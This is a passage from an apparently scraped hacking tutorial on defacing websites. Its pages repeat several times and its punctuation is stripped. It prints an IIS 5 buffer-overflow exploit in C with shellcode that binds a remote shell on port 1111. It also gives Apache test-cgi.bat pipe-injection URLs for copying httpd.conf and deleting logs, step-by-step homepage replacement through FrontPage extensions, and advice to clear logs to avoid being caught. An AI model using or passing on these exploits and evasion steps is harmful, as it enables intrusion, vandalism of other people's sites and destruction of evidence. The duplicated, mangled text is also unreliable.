xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 10
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 11
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
